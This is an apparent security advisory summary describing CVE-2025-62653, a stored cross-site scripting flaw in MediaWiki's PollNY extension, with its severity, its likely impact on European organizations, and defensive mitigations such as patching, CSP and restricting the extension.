CVE-2025-62653 identifies a stored Cross-site Scripting (XSS) vulnerability in the PollNY extension of MediaWiki, versions 1.39, 1.43, and 1.44. The vulnerability stems from improper neutralization of input during web page generation, classified under CWE-79. Stored XSS allows an attacker to inject malicious JavaScript code that is permanently stored on the server and executed in the browsers of users who visit the affected pages. This can lead to session hijacking, credential theft, or unauthorized actions performed on behalf of the victim. The vulnerability requires the attacker to have high privileges and user interaction, increasing the attack complexity. The CVSS 4.0 vector indicates network attack vector, high attack complexity, privileges required, user interaction required, and low impact on confidentiality, integrity, and availability. No public exploits or patches are currently available, but the issue is officially published and tracked. MediaWiki is widely used for collaborative content management, including by European public institutions, educational entities, and private organizations, making this vulnerability relevant for those environments. The PollNY extension is a polling feature add-on, and its compromise could allow attackers to embed malicious scripts in polls or related pages.

For European organizations, exploitation of this vulnerability could lead to unauthorized script execution in user browsers, resulting in session hijacking, phishing, or defacement of wiki pages. Although the CVSS score is low, the impact on confidentiality and integrity is non-negligible in environments where MediaWiki is used for sensitive or internal collaboration. Public sector entities, universities, and enterprises relying on MediaWiki for documentation or knowledge sharing could see reputational damage or data exposure if attackers leverage this XSS flaw. The requirement for high privileges and user interaction reduces the likelihood of widespread exploitation but does not eliminate risk, especially in targeted attacks. Additionally, the persistence of stored XSS increases the attack surface over time. The lack of known exploits in the wild currently limits immediate risk but does not preclude future exploitation once the vulnerability becomes more widely known.

European organizations should monitor for official patches or updates from The Wikimedia Foundation and apply them promptly once available. Until patches are released, administrators should consider disabling or restricting the PollNY extension, especially in environments with high-risk users. Implement robust input validation and output encoding in MediaWiki configurations to prevent injection of malicious scripts. Deploy Content Security Policies (CSP) to restrict execution of unauthorized scripts in browsers accessing MediaWiki instances. Conduct regular security audits and penetration testing focused on web application vulnerabilities, including XSS. Educate users about phishing and suspicious links to reduce the impact of potential XSS exploitation. Consider network-level protections such as Web Application Firewalls (WAFs) with rules to detect and block XSS payloads targeting MediaWiki. Maintain strict access controls and monitor logs for unusual activity related to the PollNY extension.